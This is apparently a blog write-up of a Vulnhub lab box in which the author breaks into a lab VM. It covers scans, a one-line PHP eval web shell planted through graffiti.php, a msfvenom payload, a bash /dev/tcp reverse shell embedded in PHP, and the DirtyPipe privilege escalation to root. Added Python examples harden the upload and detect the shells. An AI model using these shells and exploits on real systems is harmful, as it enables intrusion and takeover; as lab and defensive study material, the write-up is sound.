
Vulnhub box notes 2: matrix-breakout-2-morpheus

Posted: 2023-04-30 17:24:33  Views: 40

I. Introduction

A lab box themed on The Matrix.

Topics covered

  • Host discovery
  • Port and service scanning
  • The port scan of section 1.2 done without tools (bash /dev/tcp)
  • Directory brute-forcing with ffuf
  • One-line PHP web shell
  • Reverse shells with msf and AntSword
  • Image steganography
  • Exploiting CVE-2022-0847

II. Environment

  • Attacker: Kali
  • Target: matrix-breakout-2-morpheus

III. Process

1. Information gathering

1.1 Host discovery

nmap scan

┌──(root㉿kali)-[~]
└─# nmap -sn 192.168.124.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-27 06:50 EDT
Nmap scan report for 192.168.124.1
Host is up (0.00021s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.124.2
Host is up (0.00027s latency).
MAC Address: 00:50:56:E2:53:85 (VMware)
Nmap scan report for 192.168.124.132
Host is up (0.00012s latency).
MAC Address: 00:0C:29:09:6C:9D (VMware)
Nmap scan report for 192.168.124.254
Host is up (0.00013s latency).
MAC Address: 00:50:56:E6:63:42 (VMware)
Nmap scan report for 192.168.124.129
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 14.06 seconds

Target found: 192.168.124.132

ping sweep
Run the following one-liner:
for i in {1..254};do ping -c 1 -w 1 192.168.124.$i|grep from;done

┌──(root㉿kali)-[~]
└─# for i in {1..254};do ping -c 1 -w 1 192.168.124.$i|grep from;done
64 bytes from 192.168.124.2: icmp_seq=1 ttl=128 time=0.155 ms
64 bytes from 192.168.124.129: icmp_seq=1 ttl=64 time=0.026 ms
64 bytes from 192.168.124.132: icmp_seq=1 ttl=64 time=1.21 ms

1.2 Service enumeration

Port scan

Using nmap
nmap --min-rate 10000 -p- 192.168.124.132

┌──(root㉿kali)-[~]
└─# nmap --min-rate=10000 -p- 192.168.124.132
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-27 06:57 EDT
Nmap scan report for 192.168.124.132
Host is up (0.00015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
81/tcp open  hosts2-ns
MAC Address: 00:0C:29:09:6C:9D (VMware)

Nmap done: 1 IP address (1 host up) scanned in 8.18 seconds

Ports 22, 80 and 81 are open

Port scan with the bash pseudo-device
This has to run under bash, since /dev/tcp is a bash feature, not a real device:
for i in {1..65535};do (echo < /dev/tcp/192.168.124.132/$i) &>/dev/null && printf "\n[+] The Open Port is:%d\n" "$i" || printf "." ;done

┌──(root㉿kali)-[~]
└─# for i in {1..65535};do (echo < /dev/tcp/192.168.124.132/$i) &>/dev/null && printf "\n[+] The Open Port is:%d\n" "$i" || printf "." ;done
.....................
[+] The Open Port is:22
.........................................................
[+] The Open Port is:80

[+] The Open Port is:81
.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Service version scan

nmap -sV -sT -O -p22,80,81 192.168.124.132

┌──(root㉿kali)-[~]
└─# nmap -sV -sT -O -p22,80,81 192.168.124.132
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-27 06:59 EDT
Nmap scan report for 192.168.124.132
Host is up (0.00045s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.51 ((Debian))
81/tcp open  http    nginx 1.18.0
MAC Address: 00:0C:29:09:6C:9D (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 - 5.3 (99%), Linux 2.6.32 (96%), Linux 3.2 - 4.9 (96%), Netgear ReadyNAS 2100 (RAIDiator 4.2.24) (96%), Linux 2.6.32 - 3.10 (96%), Linux 4.15 - 5.6 (96%), Linux 5.3 - 5.4 (96%), Sony X75CH-series Android TV (Android 5.0) (95%), Linux 3.1 (95%), Linux 3.2 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.26 seconds

Port 22 is SSH, 80 is Apache and 81 is nginx

Vulnerability scan

nmap --script=vuln -p22,80,81 192.168.124.132

┌──(root㉿kali)-[~]
└─# nmap --script=vuln -p22,80,81 192.168.124.132
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-27 07:01 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.124.132
Host is up (0.00036s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /test.php: Test page
|_  /robots.txt: Robots file
81/tcp open  hosts2-ns
MAC Address: 00:0C:29:09:6C:9D (VMware)

Nmap done: 1 IP address (1 host up) scanned in 57.17 seconds

Port 80 exposes two interesting files, test.php and robots.txt

1.3 Directory brute-forcing

dirsearch -u http://192.168.124.132 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Brute-forcing directories with ffuf (extensions are appended literally, so each one needs its leading dot)

ffuf -u http://192.168.124.132/FUZZ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -c -ic -e .txt,.zip,.php,.html

Scan results

┌──(root㉿kali)-[~]
└─# ffuf -u http://192.168.124.132/FUZZ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -c -ic -e .txt,.zip,.php,html

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.124.132/FUZZ
 :: Wordlist         : FUZZ: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
 :: Extensions       : .txt .zip .php html 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

.php                    [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 5ms]
javascript              [Status: 301, Size: 323, Words: 20, Lines: 10, Duration: 1ms]
robots.txt              [Status: 200, Size: 47, Words: 8, Lines: 2, Duration: 2ms]
graffiti.txt            [Status: 200, Size: 147, Words: 25, Lines: 7, Duration: 28ms]
graffiti.php            [Status: 200, Size: 469, Words: 36, Lines: 29, Duration: 57ms]
.php                    [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 12ms]
server-status           [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 8ms]
:: Progress: [1102735/1102735] :: Job [1/1] :: 6055 req/sec :: Duration: [0:02:13] :: Errors: 0 ::

Three sensitive files exist: robots.txt, graffiti.txt and graffiti.php

2. Browsing the site

Home page

Visiting robots.txt gives just one line: There's no white rabbit here. Keep searching!
Visiting graffiti.php

Whatever is typed into the form gets written to graffiti.txt

Visiting graffiti.txt
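The write-up never shows graffiti.php's source; what it observes is that the form writes to graffiti.txt and that the POST body carries a file field naming the output file. The following is an added example, not the box's code: the observed behaviour mirrored in Python beside a hardened version of the same decision. WEB_ROOT (taken from the listing later in the write-up) and the allowlist ALLOWED_TARGETS are assumptions made for the example.

```python
import posixpath
from typing import Optional

# Assumed layout: the write-up shows the web root as /var/www/html but not
# graffiti.php's source; the page is only meant to append to graffiti.txt.
WEB_ROOT = "/var/www/html"
ALLOWED_TARGETS = {"graffiti.txt"}


def vulnerable_target(file_param: str) -> str:
    """Behaviour observed in the write-up, mirrored in Python: the client's
    'file' field chooses the output name, so file=test.php drops a file in
    the web root that Apache will execute as PHP."""
    return posixpath.join(WEB_ROOT, file_param)


def hardened_target(file_param: str) -> Optional[str]:
    """Return the path to append to, or None when the request must be refused.

    Each check alone would have stopped the shell drop; together they are
    cheap defence in depth:
    1. a bare filename only (no slashes, so no ../ traversal),
    2. an allowlist of exact names (no attacker-chosen .php),
    3. the resolved path must still sit inside WEB_ROOT.
    """
    if posixpath.basename(file_param) != file_param:
        return None                       # had a directory component
    if file_param not in ALLOWED_TARGETS:
        return None                       # not a name this page may write
    resolved = posixpath.normpath(posixpath.join(WEB_ROOT, file_param))
    if not resolved.startswith(WEB_ROOT + "/"):
        return None
    return resolved


if __name__ == "__main__":
    for param in ("graffiti.txt", "test.php", "../../etc/cron.d/job",
                  "graffiti.txt/../x.php", ""):
        print(f"{param!r:26} vulnerable={vulnerable_target(param)!r:40} "
              f"hardened={hardened_target(param)!r}")
```

The allowlist is the check that matters most here: even with traversal blocked, letting the client pick any bare name still allows a .php file to be written into a directory the server executes from.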

3. Getting a shell

There are several ways to do this

Option 1

01 One-line PHP web shell

Capture the POST request

POST /graffiti.php HTTP/1.1

Host: 192.168.124.132

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 29

Origin: http://192.168.124.132

Connection: close

Referer: http://192.168.124.132/graffiti.php

Upgrade-Insecure-Requests: 1


//message=cmd&file=graffiti.txt    // original body
message=<?php eval($_POST['CMD']);?>&file=test.php

Then connect to it with AntSword
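From the defender's side, the artefact this step leaves behind is a PHP file in the web root containing eval() over request data. The following added example (not part of the write-up) sweeps a web root for that and for the two other idioms used later on this page (PHP shelling out, and the bash /dev/tcp reverse shell), then narrows the hits to files the server would actually execute. The sample web root is constructed here: file names follow the directory listing further down the page, contents are written for the example, and the indicator list is mine.

```python
import os
import re
import tempfile
from typing import Dict, List, Tuple

# Indicators a defender would sweep a web root for after an incident like the
# one above. Constructed list for this example; tune it to your own stack.
INDICATORS: Dict[str, "re.Pattern[str]"] = {
    "eval-of-request-data": re.compile(
        r"eval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b", re.IGNORECASE),
    "php-shell-out": re.compile(
        r"\b(?:exec|system|shell_exec|passthru|popen|proc_open)\s*\(", re.IGNORECASE),
    "dev-tcp-reverse-shell": re.compile(
        r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d{1,5}"),
}

# Extensions a default Apache/PHP setup executes; a hit in any other file is
# still worth reading but cannot run on its own.
SERVED_EXTENSIONS = (".php", ".phtml", ".phar")

Hit = Tuple[str, str]   # (path relative to the web root, indicator name)


def scan_web_root(root: str) -> List[Hit]:
    """Walk root and return every (file, indicator) pair, sorted."""
    hits: List[Hit] = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            try:
                with open(path, "rb") as fh:
                    # decode leniently so a binary blob cannot abort the sweep
                    text = fh.read().decode("utf-8", errors="replace")
            except OSError:
                continue
            rel = os.path.relpath(path, root)
            for name, pattern in INDICATORS.items():
                if pattern.search(text):
                    hits.append((rel, name))
    return sorted(hits)


def executable_hits(hits: List[Hit]) -> List[Hit]:
    """Keep only hits in files the web server would run as PHP."""
    return [h for h in hits if h[0].lower().endswith(SERVED_EXTENSIONS)]


def build_sample_root() -> str:
    """Constructed web root: file names follow the listing in the write-up,
    contents are samples written for this example."""
    root = tempfile.mkdtemp(prefix="webroot-")
    samples = {
        "index.html": "<html><body>Morpheus</body></html>\n",
        "index.php": "<?php echo date('c'); ?>\n",
        # the same one-liner landing in a .txt: a finding, but not executable
        "graffiti.txt": "Follow the white rabbit\n<?php eval($_POST['CMD']);?>\n",
        "test.php": "<?php eval($_POST['CMD']);?>",
        "shell.php": "<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/192.168.124.129/4444 0>&1'\"); ?>",
    }
    for name, body in samples.items():
        with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    root = build_sample_root()
    hits = scan_web_root(root)
    for path, indicator in hits:
        print(f"{path:14} {indicator}")
    print("executable:", sorted({p for p, _ in executable_hits(hits)}))
```

Pairing the sweep with file modification times (compare against the Oct 2021 timestamps of the original files in the listing later on this page) separates the box's own content from anything dropped during the engagement.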

02 msf payload + privilege escalation

Generate the msf payload

 ┌──(root㉿kali)-[~]
└─# msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.124.129 lport=4444 -f elf -o shell.elf                                                 
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
Saved as: shell.elf

Upload it to the target with AntSword and make it executable

Start the listener

msfconsole

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp 
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > set lhost 192.168.124.132
lhost => 192.168.124.132
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.124.132  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > run

[-] Handler failed to bind to 192.168.124.132:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] Sending stage (989032 bytes) to 192.168.124.132
[*] Meterpreter session 1 opened (192.168.124.129:4444 -> 192.168.124.132:36648 ) at 2023-04-27 08:39:26 -0400

meterpreter > 
meterpreter > getuid
Server username: www-data
meterpreter > 


Use the privilege-escalation helper post/multi/recon/local_exploit_suggester

meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                   Information                 Connection
  --  ----  ----                   -----------                 ----------
  1         meterpreter x86/linux  www-data @ 192.168.124.132  192.168.124.129:4444 -> 192.168.124.132:36648  (192.168.124.132)

msf6 exploit(multi/handler) > search suggeste

Matching Modules
================

   #  Name                                             Disclosure Date  Rank    Check  Description
   -  ----                                             ---------------  ----    -----  -----------
   0  auxiliary/server/icmp_exfil                                       normal  No     ICMP Exfiltration Service
   1  exploit/windows/browser/ms10_018_ie_behaviors    2010-03-09       good    No     MS10-018 Microsoft Internet Explorer DHTML Behaviors Use After Free
   2  post/multi/recon/local_exploit_suggester                          normal  No     Multi Recon Local Exploit Suggester
   3  exploit/windows/smb/timbuktu_plughntcommand_bof  2009-06-25       great   No     Timbuktu PlughNTCommand Named Pipe Buffer Overflow


Interact with a module by name or index. For example info 3, use 3 or use exploit/windows/smb/timbuktu_plughntcommand_bof

msf6 exploit(multi/handler) > use 2
msf6 post(multi/recon/local_exploit_suggester) > options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 192.168.124.132 - Collecting local exploits for x86/linux...
[*] 192.168.124.132 - 40 exploit checks are being tried...
[+] 192.168.124.132 - exploit/linux/local/cve_2022_0847_dirtypipe: The target appears to be vulnerable. Linux kernel version found: 5.10.0
[+] 192.168.124.132 - exploit/linux/local/su_login: The target appears to be vulnerable.
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) > 

CVE-2022-0847 is present

//search for the exploit module and use it
msf6 post(multi/recon/local_exploit_suggester) > search 2022_0847

Matching Modules
================

   #  Name                                         Disclosure Date  Rank       Check  Description
   -  ----                                         ---------------  ----       -----  -----------
   0  exploit/linux/local/cve_2022_0847_dirtypipe  2022-02-20       excellent  Yes    Dirty Pipe Local Privilege Escalation via CVE-2022-0847


Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/local/cve_2022_0847_dirtypipe

msf6 post(multi/recon/local_exploit_suggester) > use 0
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > options

Module options (exploit/linux/local/cve_2022_0847_dirtypipe):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   COMPILE           Auto             yes       Compile on target (Accepted: Auto, True, False)
   SESSION                            yes       The session to run this module on
   SUID_BINARY_PATH  /bin/passwd      no        The path to a suid binary
   WRITABLE_DIR      /tmp             yes       A directory where we can write files


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

//switch the listener port to 5555 to avoid a conflict with the first handler
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > set lport 5555
lport => 5555
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > set lhost 192.168.124.129
lhost => 192.168.124.129
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > run

[-] Msf::OptionValidateError The following options failed to validate: SESSION
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > options

Module options (exploit/linux/local/cve_2022_0847_dirtypipe):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   COMPILE           Auto             yes       Compile on target (Accepted: Auto, True, False)
   SESSION                            yes       The session to run this module on
   SUID_BINARY_PATH  /bin/passwd      no        The path to a suid binary
   WRITABLE_DIR      /tmp             yes       A directory where we can write files


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.124.129  yes       The listen address (an interface may be specified)
   LPORT  5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > set session 1
session => 1
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > run

[*] Started reverse TCP handler on 192.168.124.129:5555 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Linux kernel version found: 5.10.0
[*] Executing exploit '/tmp/.vtpstmsxw /bin/passwd'
[*] Sending stage (3020772 bytes) to 192.168.124.132
[+] Deleted /tmp/.vtpstmsxw
[*] Meterpreter session 2 opened (192.168.124.129:5555 -> 192.168.124.132:56896 ) at 2023-04-27 08:49:48 -0400

meterpreter > whoami
[-] Unknown command: whoami
meterpreter > getuid
Server username: root

Root obtained. This route is fast, but it feels too easy

Option 2

03 Reverse shell and listener

Start a listener with nc: nc -lnvp 4444

┌──(root㉿kali)-[~]
└─# nc -lvnp 4444                                
listening on [any] 4444 ...
connect to [192.168.124.129] from (UNKNOWN) [192.168.124.132] 36940
bash: cannot set terminal process group (910): Inappropriate ioctl for device
bash: no job control in this shell
www-data@morpheus:/var/www/html$ 

Use the PHP reverse shell <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.124.129/4444 0>&1'"); ?> and URL-encode the special characters

Modified request

POST /graffiti.php HTTP/1.1

Host: 192.168.124.132

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 111

Origin: http://192.168.124.132

Connection: close

Referer: http://192.168.124.132/graffiti.php

Upgrade-Insecure-Requests: 1



message=<%3fphp+exec("/bin/bash+-c+'bash+-i+>%26+/dev/tcp/192.168.124.129/4444+0>%261'")%3b+%3f>&file=shell.php

04 Vulnerability detection and privilege escalation

Upload a vulnerability scanning script
PEASS-ng
PEASS-ng is an excellent toolkit; its linpeas_base.sh is used here for the scan
Upload

┌──(root㉿kali)-[~/…/update/PEASS-ng/linPEAS/builder]
└─# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.124.132 - - [27/Apr/2023 09:24:01] "GET /linpeas_base.sh HTTP/1.1" 200 -
^C
Keyboard interrupt received, exiting.

Download it, make it executable and run it. Oddly, the script found no vulnerabilities this time

www-data@morpheus:/var/www/html$ wget http://192.168.124.129:8000/linpeas_base.sh
www-data@morpheus:/var/www/html$ chmod +x linpeas_base.sh
www-data@morpheus:/var/www/html$ ./linpeas_base.sh

linux-exploit-suggester script
Uploading it and making it executable is the same as above, so it is not repeated
Output

[+] [CVE-2021-3490] eBPF ALU32 bounds tracking for bitwise ops

   Details: https://www.graplsecurity.com/post/kernel-pwning-with-ebpf-a-love-story
   Exposure: probable
   Tags: ubuntu=20.04{kernel:5.8.0-(25|26|27|28|29|30|31|32|33|34|35|36|37|38|39|40|41|42|43|44|45|46|47|48|49|50|51|52)-*},ubuntu=21.04{kernel:5.11.0-16-*}
   Download URL: https://codeload.github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490/zip/main
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2022-0847] DirtyPipe

   Details: https://dirtypipe.cm4all.com/
   Exposure: probable
   Tags: ubuntu=(20.04|21.04),[ debian=11 ]
   Download URL: https://haxx.in/files/dirtypipez.c

[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)

   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: less probable
   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2022-2586] nft_object UAF

   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: less probable
   Tags: ubuntu=(20.04){kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: mint=19,ubuntu=18|20, debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

[+] [CVE-2017-5618] setuid screen v4.5.0 LPE

   Details: https://seclists.org/oss-sec/2017/q1/184
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154

CVE-2022-0847 was detected
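Both suggesters only say "appears to be vulnerable" / "Exposure: probable": the Metasploit module matched the string 5.10.0, and linux-exploit-suggester matched the distro tag. A defender checking a fleet wants the real upstream level, because 5.10.0 here is Debian's ABI name, not the kernel version. The following added example (not from the write-up or either tool) parses /proc/version and compares against the upstream fix points for CVE-2022-0847 (introduced in 5.8; fixed in 5.16.11, 5.15.25 and 5.10.102; 5.17 shipped fixed). The /proc/version lines are constructed samples, not captured from the box.

```python
import re
from typing import Optional, Tuple

Version = Tuple[int, int, int]

# Upstream history of CVE-2022-0847 (Dirty Pipe): the bug entered in 5.8 and
# was fixed in 5.16.11, 5.15.25 and 5.10.102; 5.17 shipped with the fix.
DIRTYPIPE_INTRODUCED: Version = (5, 8, 0)
DIRTYPIPE_FIXED_IN = {(5, 10): 102, (5, 15): 25, (5, 16): 11}
DIRTYPIPE_FIXED_FROM: Version = (5, 17, 0)

# Debian prints the real upstream level after the "#N SMP" build tag, e.g.
# "#1 SMP Debian 5.10.70-1"; anchoring on "#N" skips the gcc version string,
# which also contains the word "Debian" followed by a version number.
_DEBIAN_LEVEL = re.compile(r"#\d+\b.*\bDebian (\d+)\.(\d+)\.(\d+)")
_ANY_LEVEL = re.compile(r"(\d+)\.(\d+)\.(\d+)")


def upstream_version(proc_version: str) -> Optional[Version]:
    """Extract the upstream kernel level from a /proc/version line.

    uname -r on Debian gives an ABI name such as 5.10.0-9-amd64 (which is
    why the suggester above reports "5.10.0"); prefer the Debian package
    level when present and fall back to the first x.y.z in the line.
    """
    m = _DEBIAN_LEVEL.search(proc_version) or _ANY_LEVEL.search(proc_version)
    if m is None:
        return None
    major, minor, patch = (int(g) for g in m.groups())
    return (major, minor, patch)


def dirtypipe_vulnerable(version: Version) -> bool:
    """True when an unpatched upstream kernel of this level has the bug."""
    if version < DIRTYPIPE_INTRODUCED or version >= DIRTYPIPE_FIXED_FROM:
        return False
    fixed_patch = DIRTYPIPE_FIXED_IN.get(version[:2])
    if fixed_patch is None:
        return True                 # 5.8, 5.9, 5.11-5.14 reached EOL unfixed
    return version[2] < fixed_patch


def assess(proc_version: str) -> Optional[bool]:
    """None when no version could be parsed, else the vulnerability verdict."""
    v = upstream_version(proc_version)
    return None if v is None else dirtypipe_vulnerable(v)


# Constructed /proc/version lines (not captured from the box in the write-up).
SAMPLES = {
    "debian-5.10.70": "Linux version 5.10.0-9-amd64 (debian-kernel@lists.debian.org) "
                      "(gcc-10 (Debian 10.2.1-6) 10.2.1 20210110) #1 SMP Debian 5.10.70-1 (2021-09-30)",
    "debian-5.10.106": "Linux version 5.10.0-13-amd64 (debian-kernel@lists.debian.org) "
                       "#1 SMP Debian 5.10.106-1 (2022-03-17)",
    "vanilla-5.16.10": "Linux version 5.16.10 (build@host) (gcc 11.2.0) #1 SMP",
    "vanilla-5.4.180": "Linux version 5.4.180 (build@host) (gcc 9.4.0) #1 SMP",
}

if __name__ == "__main__":
    for label, line in SAMPLES.items():
        print(f"{label:16} upstream={upstream_version(line)} vulnerable={assess(line)}")
```

The check is only as good as the version string: distributions that backport fixes without moving the upstream level (enterprise kernels in particular) need the package changelog or a runtime test, which is exactly why the tools above hedge with "appears".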

Exploiting CVE-2022-0847 DirtyPipe
Using this script from GitHub

www-data@morpheus:/var/www/html$ ./Dirty-Pipe.sh
./Dirty-Pipe.sh
/etc/passwd已备份到/tmp/passwd
It worked!
# 恢复原来的密码
rm -rf /etc/passwd
mv /tmp/passwd /etc/passwd
whoami 
root

Upgrade to an interactive shell

python3 -c "import pty;pty.spawn('/bin/bash')"
root@morpheus:/var/www/html# ls
ls
Dirty-Pipe.sh  graffiti.txt       linux-exploit-suggester.sh  test02.elf
compile.sh     index.html         robots.txt                  trinity.jpeg
exp            index.html.1       shell.elf
exp.c          linpeas_base.sh    shell.php
graffiti.php   linpeas_base02.sh  test.php
root@morpheus:/var/www/html# whoami
whoami
root
root@morpheus:/var/www/html# 

Two more users exist

root@morpheus:/var/www/html# cd /home   
cd /home
root@morpheus:/home# ls
ls
cypher  trinity
root@morpheus:/home# 

4. Getting the flag

There is a FLAG.txt in the root directory; its contents:

root@morpheus:/# cat FLAG.txt
cat FLAG.txt
Flag 1!

You've gotten onto the system.  Now why has Cypher locked everyone out of it?

Can you find a way to get Cypher's password? It seems like he gave it to 
Agent Smith, so Smith could figure out where to meet him.

Also, pull this image from the webserver on port 80 to get a flag.

/.cypher-neo.png

The hint points to a hidden file in the html directory

root@morpheus:/var/www/html# ls -alh
ls -alh
total 800K
drwxr-xr-x 2 www-data www-data 4.0K Apr 30 08:34 .
drwxr-xr-x 3 root     root     4.0K Oct 28  2021 ..
-rw-r--r-- 1 www-data www-data 373K Oct 28  2021 .cypher-neo.png
-rwxr-xr-x 1 www-data www-data 4.8K Apr 30 08:33 Dirty-Pipe.sh
-rw-r--r-- 1 www-data www-data   79 Apr 30 08:01 cmd.php
-rwxr-xr-x 1 www-data www-data  18K Apr 30 08:34 exp
-rw-r--r-- 1 www-data www-data 4.3K Apr 30 08:34 exp.c
-rw-r--r-- 1 www-data www-data  770 Oct 28  2021 graffiti.php
-rw-r--r-- 1 www-data www-data  143 Apr 30 07:59 graffiti.txt
